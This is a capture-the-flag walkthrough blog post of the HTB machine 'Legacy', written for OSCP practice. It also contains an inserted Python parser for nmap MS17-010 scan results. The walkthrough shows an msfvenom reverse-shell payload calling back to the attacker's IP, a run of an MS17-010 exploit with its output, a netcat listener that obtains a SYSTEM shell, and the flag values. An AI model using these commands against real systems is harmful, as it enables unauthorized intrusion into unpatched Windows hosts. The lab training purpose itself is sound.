My PWK lab access has ended, but I haven't stopped preparing for the upcoming OSCP examination. I've been practicing on the HTB labs to sharpen my skills, and working on writing buffer overflow exploits so that I'm more comfortable with the process. I hope to write more tutorials once I've finished my OSCP journey, but for now I'm focusing primarily on studying.

That doesn't mean I'm going to leave you all high and dry, though. Nope! Today I'm posting my walkthrough of the HTB machine called “Legacy.”

Enumeration

Scans revealed ports 139 and 445 open, and a quick nmap script scan showed that the host is affected by a Remote Code Execution (RCE) vulnerability:

root@haxys:/htb# nmap -sT -p 139,445 -PN --script smb-vuln-ms17-010 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 14:12 EDT
Nmap scan report for 10.10.10.4
Host is up (0.067s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
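As an added example (not part of the original post), here is a small Python parser that turns the nmap smb-vuln-ms17-010 output shown above into a structured finding, so results from a sweep can be queued for patching instead of being read by eye. The sample input is a constructed, trimmed copy of the scan output; the function names are my own.

```python
import re
# Constructed sample, trimmed from the smb-vuln-ms17-010 scan output in the post.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

SCRIPT_RE = re.compile(r"^\|_?\s?(.*)$")   # strips the "| " / "|_ " gutter

def parse_nmap_vuln_output(text):
    """Parse one host's normal-format nmap output into {host, scripts}."""
    report = {"host": None, "scripts": {}}
    current = None
    for raw in text.splitlines():
        if raw.startswith("Nmap scan report for "):
            # last token is the IP, possibly in parentheses after a hostname
            report["host"] = raw.split()[-1].strip("()")
            continue
        m = SCRIPT_RE.match(raw)
        if not m: continue                 # port table, banners, blank lines
        body = m.group(1)
        if body and not body[0].isspace() and body.endswith(":"):
            current = body[:-1]            # unindented "name:" opens a script
            report["scripts"][current] = {"state": None, "cves": [],
                                          "risk": None, "references": []}
            continue
        if current is None: continue
        entry, field = report["scripts"][current], body.strip()
        if field.startswith("State:"):
            entry["state"] = field.split(":", 1)[1].strip()
        elif field.startswith("IDs:"):
            entry["cves"] = re.findall(r"CVE-\d{4}-\d+", field)
        elif field.startswith("Risk factor:"):
            entry["risk"] = field.split(":", 1)[1].strip()
        elif field.startswith("http"):
            entry["references"].append(field)
    return report

def vulnerable_findings(report):
    """Flatten to (host, script, cve, risk) rows for a patch-tracking queue."""
    return [(report["host"], name, cve, r["risk"])
            for name, r in report["scripts"].items() if r["state"] == "VULNERABLE"
            for cve in (r["cves"] or [None])]
```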

Exploitation

I discovered a blog post that directed me to a script (from this GitHub repo) which exploits the MS17-010 vulnerability without relying on Metasploit. I downloaded the script and saved it as send_and_execute.py. I also downloaded a required library and saved it as mysmb.py, in the same directory.

The exploit works much like its name implies: it sends an executable file to the target, then tells the target to run the file as the System user. I would need to create a payload to send to the target.

Using msfvenom, I crafted a reverse-TCP payload:

root@haxys:~/htb# msfvenom -p windows/shell_reverse_tcp -f exe -a x86 \
>                          --platform windows -o payload.exe LPORT=443 \
>                          LHOST=10.10.14.22 EXITFUNC=thread
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe

With preparations complete, I started a netcat listener on port 443, then ran the exploit:

root@haxys:~/htb# python send_and_execute.py 10.10.10.4 payload.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81e16da8
SESSION: 0xe1b25310
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1bc3278
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1bc3318
overwriting token UserAndGroups
Sending file XX2NUF.exe...
Opening SVCManager on 10.10.10.4.....
Creating service xFDj.....
Starting service xFDj.....
The NETBIOS connection with the remote host timed out.
Removing service xFDj.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

Returning to netcat, I had a shell. However, I couldn't confirm that I was logged in as System:

root@haxys:~/htb# nc -vnlp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.4] 1030
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>echo %username%
echo %username%
%username%

I used the send_and_execute.py script a second time, sending over the whoami.exe program found in the /usr/share/windows-binaries/ directory of Kali:

root@haxys:~/htb# python send_and_execute.py 10.10.10.4 /usr/share/windows-binaries/whoami.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
  <...>
Sending file CYVONX.exe...
  <...>
Done

The file was uploaded as CYVONX.exe and stored in the C: root directory. The program informed me that I was running as NT AUTHORITY\SYSTEM:

C:\WINDOWS\system32>cd C:\
cd C:\

C:\>CYVONX.exe
CYVONX.exe
NT AUTHORITY\SYSTEM

From there, it was a simple matter to obtain the user and root flags:

C:\>cd "C:\Documents and Settings\john\Desktop"
cd "C:\Documents and Settings\john\Desktop"

C:\Documents and Settings\john\Desktop>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.10.10.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.10.10.2

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\Documents and Settings\john\Desktop>cd ..\..\Administrator\Desktop
cd ..\..\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713

Conclusions

This is probably the easiest box on HTB. MS17-010 is a well-known, widely publicized vulnerability with weaponized exploits built into Kali. However, it seems that most people prefer to use Metasploit to exploit the vulnerability. Learning how to exploit the system without Metasploit was a handy and useful lesson. In fact, when I was first exploring this vulnerability, I found one system that nmap reported as vulnerable, but which Metasploit couldn't crack. By using the manual exploit, I was able to gain access to the machine and capture the flags.

This is why I always look for manual exploits. If you use Metasploit for everything, then all you're doing is learning how to use Metasploit. But if you seek out manual exploitation methods, you learn more about how the vulnerabilities and exploits work. That way, when Metasploit fails you, you're not totally lost.